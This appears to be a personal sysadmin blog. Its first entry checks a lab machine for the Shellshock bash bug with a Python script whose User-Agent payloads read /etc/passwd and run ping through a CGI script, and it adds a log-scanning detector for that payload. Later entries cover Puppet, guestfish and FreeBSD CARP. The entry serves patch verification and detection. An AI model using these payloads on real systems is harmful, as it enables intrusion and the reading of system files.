lost and found ( for me ? )

bash vulnerability ( CVE-2014-6271 and CVE-2014-7169 )

Here are the logs from when I checked whether this is fixed on my machine.

client (python script) --- apache + cgi

[ unpatched versions  ]

# bash --version
GNU bash, version 4.3.11(1)-release (x86_64-pc-linux-gnu)

This script tries to execute the cat /etc/passwd and ping commands through the CGI script.
# cat http_request.py
#!/usr/bin/env python

import requests

# the CGI script on the test server (see the apache cgi configuration below)
url = 'http://192.168.11.8/example2.cgi'

# mod_cgi copies the User-Agent header into the HTTP_USER_AGENT environment
# variable; an unpatched bash imports a value that begins with "() {" as a
# function definition and executes the commands that follow it.
headers1 = {
    'User-Agent': '() { test;};echo "Content-type: text/plain"; echo; echo; /bin/cat /etc/passwd',
}

headers2 = {
    'User-Agent': '() { test;}; echo "Content-type: text/plain"; echo; echo; /bin/ping -c 3 192.168.11.1',
}

r = requests.get(url, headers=headers1)
print(r.text)

r = requests.get(url, headers=headers2)
print(r.text)


# ./http_request.py
first request


root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin


done!

second request


PING 192.168.11.1 (192.168.11.1) 56(84) bytes of data.
64 bytes from 192.168.11.1: icmp_seq=1 ttl=64 time=13.6 ms
64 bytes from 192.168.11.1: icmp_seq=2 ttl=64 time=1.59 ms
64 bytes from 192.168.11.1: icmp_seq=3 ttl=64 time=6.83 ms

--- 192.168.11.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2003ms
rtt min/avg/max/mdev = 1.598/7.363/13.656/4.937 ms

done!


[ patched versions ]

# bash --version
GNU bash, version 4.3.11(1)-release (x86_64-pc-linux-gnu)


# ./http_request.py
first request


Hi

done!

second request


Hi

done!


[ apache cgi configuration ]

# tail -1 /etc/lsb-release
DISTRIB_DESCRIPTION="Ubuntu 14.04.1 LTS"


/etc/apache2/sites-available/000-default.conf

    <Directory /var/www/html/>
        Options Indexes FollowSymLinks MultiViews ExecCGI
        AllowOverride None
        Order allow,deny
        allow from all
    </Directory>


/etc/apache2/mods-enabled/mime.conf
   AddHandler cgi-script .cgi .py .pl .rb


# a2enmod cgi

# /etc/init.d/apache2 restart

# cat /var/www/html/example2.cgi
#!/bin/bash
echo "Content-type: text/plain"
echo
echo
echo "Hi"

# chmod 705 /var/www/html/example2.cgi
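As an added example that is not part of the original post, here is the detection-side counterpart to the request script above: it parses Apache combined-format access log lines and flags requests whose client-supplied fields begin with the bash function-definition prefix that the exploit relies on. The log lines are constructed for the example; the client address and timestamps are assumptions.

```python
import re

# Apache "combined" LogFormat:
#   host ident user [time] "request" status size "referer" "user-agent"
# A double quote inside a header is logged as \", so each quoted field is a
# run of non-quote characters or backslash escapes.
QUOTED = r'(?:[^"\\]|\\.)*'
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>%s)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>%s)" "(?P<agent>%s)"$'
    % (QUOTED, QUOTED, QUOTED)
)

# Vulnerable bash imports any environment value that begins with the literal
# prefix "() {" as a function and runs the commands after the closing brace.
# mod_cgi copies request headers into the environment, so the probe appears at
# the very start of a header value. The pattern is a little looser than bash's
# own prefix check so that near-miss probes are still reported.
FUNC_DEF_RE = re.compile(r'^\(\)\s*\{')

# Constructed sample log (not from the original post). Line 2 carries the
# User-Agent payload from the test script above, line 3 a Referer variant,
# line 4 a benign User-Agent that contains braces but is not a function.
SAMPLE_LOG = r'''192.168.11.7 - - [25/Sep/2014:10:15:30 +0900] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/32.0"
192.168.11.7 - - [25/Sep/2014:10:15:32 +0900] "GET /example2.cgi HTTP/1.1" 200 1742 "-" "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/cat /etc/passwd"
192.168.11.7 - - [25/Sep/2014:10:15:35 +0900] "GET /example2.cgi HTTP/1.1" 200 3 "() { :;}; /bin/ping -c 3 192.168.11.1" "python-requests/2.2.1"
192.168.11.7 - - [25/Sep/2014:10:15:40 +0900] "GET /example2.cgi HTTP/1.1" 200 3 "-" "Mozilla/5.0 (compatible) { not a function }"
'''

def parse_combined(line):
    """Split one combined-format line into its fields, or None if it does not parse."""
    m = COMBINED_RE.match(line.rstrip('\r\n'))
    return m.groupdict() if m else None

def shellshock_fields(entry):
    """Names of the client-controlled fields that start with a function definition."""
    return [f for f in ('request', 'referer', 'agent') if FUNC_DEF_RE.match(entry[f])]

def scan(lines):
    """Return (host, time, fields) for every parseable line that carries a probe."""
    findings = []
    for line in lines:
        entry = parse_combined(line)
        if entry is not None:
            fields = shellshock_fields(entry)
            if fields:
                findings.append((entry['host'], entry['time'], fields))
    return findings

if __name__ == '__main__':
    for host, when, fields in scan(SAMPLE_LOG.splitlines()):
        print('%s %s shellshock probe in %s' % (host, when, ','.join(fields)))
```

Running it against a real access.log instead of SAMPLE_LOG shows which client fields carried the probe, which is the first thing to look at when deciding whether an unpatched CGI host was actually hit.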

Ubuntu 14.04 puppet : transfer files from puppet master to agent

Here is how to transfer files from puppet master to agent.

Reference
http://manuel.kiessling.net/2014/03/26/building-manageable-server-infrastructures-with-puppet-part-2/

There is one master and one agent in my environment.

192.168.11.12 puppet-master
192.168.11.13 puppet-agent01

puppet-master
# dpkg -l | grep puppet
ii  puppet-common                       3.4.3-1                       all          Centralized configuration management
ii  puppetmaster                        3.4.3-1                       all          Centralized configuration management - master startup and compatibility scripts
ii  puppetmaster-common                 3.4.3-1                       all          Puppet master common scripts

agent
# dpkg -l puppet
ii  puppet         3.4.3-1      all          Centralized configuration managem

This assumes that you have already installed the master and the agent.

On the master, /etc/puppet/files is the directory whose files are served to agents.
# ls /etc/puppet/files
root@puppet-master:~#

You can define this directory in /etc/puppet/fileserver.conf on the master:
root@puppet-master:~# grep -v ^# /etc/puppet/fileserver.conf

[files]
 path /etc/puppet/files
 allow *

[plugins]

I added “allow *” in the [files] section to allow agents to get files.
Restart the master:
root@puppet-master:~# /etc/init.d/puppetmaster restart
* Restarting puppet master                                              [ OK ]

Create a file on the master:
root@puppet-master:~# echo "hello world" > /etc/puppet/files/helloworld.txt
root@puppet-master:~#
root@puppet-master:~# cat /etc/puppet/files/helloworld.txt
hello world

Here is the manifest file on the master:
root@puppet-master:~# cat /etc/puppet/manifests/site.pp
node "puppet-agent01" {
    file { "/root/helloworld.txt":
        ensure => file,
        owner  => "root",
        group  => "root",
        mode   => 0644,
        source => "puppet://puppet-master/files/helloworld.txt",
    }
}

On the agent, run a one-time agent run; it gets the file from the master:
root@puppet-agent01:~# puppet agent --verbose --no-daemonize --onetime
Info: Retrieving plugin
Info: Caching catalog for puppet-agent01.tcv.jp
Info: Applying configuration version '1410190960'
Notice: /Stage[main]/Main/Node[puppet-agent01]/File[/root/helloworld.txt]/ensure: defined content as '{md5}6f5902ac237024bdd0c176cb93063dc4'
Notice: Finished catalog run in 0.22 seconds
root@puppet-agent01:~#



root@puppet-agent01:~# cat /root/helloworld.txt
hello world

The agent connected to the master on TCP destination port 8140:
root@puppet-master:~# tshark -n -r a.pcap -Y '(tcp.port == 8140)'
Running as user "root" and group "root". This could be dangerous.
 1 0.000000000 192.168.11.13 -> 192.168.11.12 TCP 74 52861 > 8140 [SYN] Seq=0 Win=29200 Len=0 MSS=1460 SACK_PERM=1 TSval=1652154 TSecr=0 WS=128
 2 0.000039000 192.168.11.12 -> 192.168.11.13 TCP 74 8140 > 52861 [SYN, ACK] Seq=0 Ack=1 Win=28960 Len=0 MSS=1460 SACK_PERM=1 TSval=1653573 TSecr=1652154 WS=128
 3 0.000433000 192.168.11.13 -> 192.168.11.12 TCP 66 52861 > 8140 [ACK] Seq=1 Ack=1 Win=29312 Len=0 TSval=1652154 TSecr=1653573

Ubuntu 14.04 : guestfish error /usr/bin/supermin-helper exited with error status 1.

If you see the following error when you try to mount KVM images with guestfs, you can solve it by running the “update-guestfs-appliance” command.

-- error
libguestfs: error: /usr/bin/supermin-helper exited with error status 1.
--

Install guestfish:
# apt-get install libguestfs-tools

# dpkg -l | grep guestfs-tools
ii  libguestfs-tools                                      1:1.24.5-1                                          amd64        guest disk image management system - tools

# guestfish

Welcome to guestfish, the guest filesystem shell for
editing virtual machine filesystems and disk images.

Type: 'help' for help on commands
     'man' to read the manual
     'quit' to quit the shell

><fs> add-ro /var/lib/libvirt/images/freebsd-vm1.img
><fs> run
libguestfs: error: /usr/bin/supermin-helper exited with error status 1.
To see full error messages you may need to enable debugging.
See http://libguestfs.org/guestfs-faq.1.html#debugging-libguestfs
><fs> list-filesystems
libguestfs: error: list_devices: call launch before using this function
(in guestfish, don't forget to use the 'run' command)
><fs> quit

# update-guestfs-appliance

# guestfish

Welcome to guestfish, the guest filesystem shell for
editing virtual machine filesystems and disk images.

Type: 'help' for help on commands
     'man' to read the manual
     'quit' to quit the shell

><fs>  add-ro /var/lib/libvirt/images/freebsd-vm1.img
><fs> list-devices
libguestfs: error: list_devices: call launch before using this function
(in guestfish, don't forget to use the 'run' command)
><fs> run
100% [progress bar] 00:00
><fs> list-devices
/dev/sda
><fs> list-filesystems
/dev/sda1: unknown
/dev/sda2: ufs
/dev/sda3: unknown
><fs> quit

FreeBSD 9.3 : how to configure carp

Here is how to configure carp on FreeBSD 9.3.

Reference

Two FreeBSD 9.3 machines are running as virtual machines, and each VM has two vNICs.

SW --- em0 [VM1] em1 ---+
                        |  (192.168.1.0/24, the CARP segment)
SW --- em0 [VM2] em1 ---+

Edit /boot/loader.conf so that the OS loads the carp module at boot:
root@bsd93-vm1:~ # cat /boot/loader.conf
if_carp_load="YES"

Reboot the OS.

Make sure the carp module is loaded:
root@bsd93-vm1:~ # kldstat
Id Refs Address            Size     Name
1    3 0xffffffff80200000 1611638  kernel
2    1 0xffffffff81812000 10db0    if_carp.ko

On VM1, add a carp0 device to em1:
root@bsd93-vm1:~ # cat /etc/rc.conf
hostname="bsd93-vm1"
keymap="jp.106x.kbd"
ifconfig_em0="DHCP"
sshd_enable="YES"
# Set dumpdev to "AUTO" to enable crash dumps, "NO" to disable
dumpdev="AUTO"
unbound_enable="YES"

ifconfig_em1="inet 192.168.1.3 netmask 255.255.255.0"
cloned_interfaces="carp0"
ifconfig_carp0="vhid 1 pass testpass 192.168.1.50/24"

On VM2:
root@bsd93-vm2:~ # cat /etc/rc.conf
hostname="bsd93-vm2"
keymap="jp.106x.kbd"
ifconfig_em0="DHCP"
sshd_enable="YES"
# Set dumpdev to "AUTO" to enable crash dumps, "NO" to disable
dumpdev="AUTO"
unbound_enable="YES"

ifconfig_em1="inet 192.168.1.4 netmask 255.255.255.0"
cloned_interfaces="carp0"
ifconfig_carp0="vhid 1 advskew 100 pass testpass 192.168.1.50/24"

Reboot VM1 and VM2.

Both VMs have the same IP, 192.168.1.50, on the carp0 device.
The backup box also holds the VIP while it is in the backup state.

VM1 is the master:
root@bsd93-vm1:~ # ifconfig -a
em0: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> metric 0 mtu 1500
options=209b<RXCSUM,TXCSUM,VLAN_MTU,VLAN_HWTAGGING,VLAN_HWCSUM,WOL_MAGIC>
ether 52:54:00:16:a6:9e
inet 192.168.11.20 netmask 0xffffff00 broadcast 192.168.11.255
nd6 options=29<PERFORMNUD,IFDISABLED,AUTO_LINKLOCAL>
media: Ethernet autoselect (1000baseT <full-duplex>)
status: active
em1: flags=8943<UP,BROADCAST,RUNNING,PROMISC,SIMPLEX,MULTICAST> metric 0 mtu 1500
options=209b<RXCSUM,TXCSUM,VLAN_MTU,VLAN_HWTAGGING,VLAN_HWCSUM,WOL_MAGIC>
ether 52:54:00:2c:8b:7b
inet 192.168.1.3 netmask 0xffffff00 broadcast 192.168.1.255
inet6 fe80::5054:ff:fe2c:8b7b%em1 prefixlen 64 scopeid 0x3
nd6 options=29<PERFORMNUD,IFDISABLED,AUTO_LINKLOCAL>
media: Ethernet autoselect (1000baseT <full-duplex>)
status: active
lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> metric 0 mtu 16384
options=600003<RXCSUM,TXCSUM,RXCSUM_IPV6,TXCSUM_IPV6>
inet6 ::1 prefixlen 128
inet6 fe80::1%lo0 prefixlen 64 scopeid 0x4
inet 127.0.0.1 netmask 0xff000000
nd6 options=21<PERFORMNUD,AUTO_LINKLOCAL>
carp0: flags=49<UP,LOOPBACK,RUNNING> metric 0 mtu 1500
inet 192.168.1.50 netmask 0xffffff00
nd6 options=29<PERFORMNUD,IFDISABLED,AUTO_LINKLOCAL>
carp: MASTER vhid 1 advbase 1 advskew 0
root@bsd93-vm1:~ #

On VM2, which is the backup:
root@bsd93-vm2:~ # ifconfig -a
em0: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> metric 0 mtu 1500
options=209b<RXCSUM,TXCSUM,VLAN_MTU,VLAN_HWTAGGING,VLAN_HWCSUM,WOL_MAGIC>
ether 52:54:00:de:6d:92
inet 192.168.11.17 netmask 0xffffff00 broadcast 192.168.11.255
nd6 options=29<PERFORMNUD,IFDISABLED,AUTO_LINKLOCAL>
media: Ethernet autoselect (1000baseT <full-duplex>)
status: active
em1: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> metric 0 mtu 1500
options=209b<RXCSUM,TXCSUM,VLAN_MTU,VLAN_HWTAGGING,VLAN_HWCSUM,WOL_MAGIC>
ether 52:54:00:e1:ea:69
inet 192.168.1.4 netmask 0xffffff00 broadcast 192.168.1.255
inet6 fe80::5054:ff:fee1:ea69%em1 prefixlen 64 scopeid 0x3
nd6 options=29<PERFORMNUD,IFDISABLED,AUTO_LINKLOCAL>
media: Ethernet autoselect (1000baseT <full-duplex>)
status: active
lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> metric 0 mtu 16384
options=600003<RXCSUM,TXCSUM,RXCSUM_IPV6,TXCSUM_IPV6>
inet6 ::1 prefixlen 128
inet6 fe80::1%lo0 prefixlen 64 scopeid 0x4
inet 127.0.0.1 netmask 0xff000000
nd6 options=21<PERFORMNUD,AUTO_LINKLOCAL>
carp0: flags=49<UP,LOOPBACK,RUNNING> metric 0 mtu 1500
inet 192.168.1.50 netmask 0xffffff00
nd6 options=29<PERFORMNUD,IFDISABLED,AUTO_LINKLOCAL>
carp: BACKUP vhid 1 advbase 1 advskew 100

VM1 (192.168.1.3) is sending advertisement packets every second (tcpdump decodes CARP as VRRPv2):
root@bsd93-vm2:~ # tcpdump -i em1 -n carp
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on em1, link-type EN10MB (Ethernet), capture size 65535 bytes
17:23:10.707902 IP 192.168.1.3 > 224.0.0.18: VRRPv2, Advertisement, vrid 1, prio 0, authtype none, intvl 1s, length 36
17:23:11.717968 IP 192.168.1.3 > 224.0.0.18: VRRPv2, Advertisement, vrid 1, prio 0, authtype none, intvl 1s, length 36

Reboot VM1.

VM2 becomes the master:
root@bsd93-vm2:~ # ifconfig carp0
carp0: flags=49<UP,LOOPBACK,RUNNING> metric 0 mtu 1500
inet 192.168.1.50 netmask 0xffffff00
nd6 options=29<PERFORMNUD,IFDISABLED,AUTO_LINKLOCAL>
carp: MASTER vhid 1 advbase 1 advskew 100

After it comes back up, VM1 is the backup:
root@bsd93-vm1:~ # ifconfig carp0
carp0: flags=49<UP,LOOPBACK,RUNNING> metric 0 mtu 1500
inet 192.168.1.50 netmask 0xffffff00
nd6 options=29<PERFORMNUD,IFDISABLED,AUTO_LINKLOCAL>
carp: BACKUP vhid 1 advbase 1 advskew 0


[ high availability for the DNS resolver “unbound” with CARP ]

With CARP, the backup machine also holds the VIP while it is in the backup state, so unbound can listen on 192.168.1.50 on both hosts and does not need to be restarted when the master/backup state changes.

VM1
unbound.conf
       interface: 192.168.1.50
       interface: 127.0.0.1

VM2
unbound.conf
       interface: 192.168.1.50
       interface: 127.0.0.1

When VM2 is master:
root@bsd93-vm2:~ # ifconfig carp0
carp0: flags=49<UP,LOOPBACK,RUNNING> metric 0 mtu 1500
inet 192.168.1.50 netmask 0xffffff00
nd6 options=29<PERFORMNUD,IFDISABLED,AUTO_LINKLOCAL>
carp: MASTER vhid 1 advbase 1 advskew 100


# /var/log/messages
Sep  7 17:57:56 bsd93-vm2 unbound: [858:0] info: 192.168.1.100 www.google.com. A IN

When VM1 is master again:
root@bsd93-vm1:~ # ifconfig carp0
carp0: flags=49<UP,LOOPBACK,RUNNING> metric 0 mtu 1500
inet 192.168.1.50 netmask 0xffffff00
nd6 options=29<PERFORMNUD,IFDISABLED,AUTO_LINKLOCAL>
carp: MASTER vhid 1 advbase 1 advskew 0


# /var/log/messages
Sep  7 17:58:45 bsd93-vm1 kernel: carp0: link state changed to UP
Sep  7 17:59:25 bsd93-vm1 unbound: [853:0] info: 192.168.1.100 www.google.com. A IN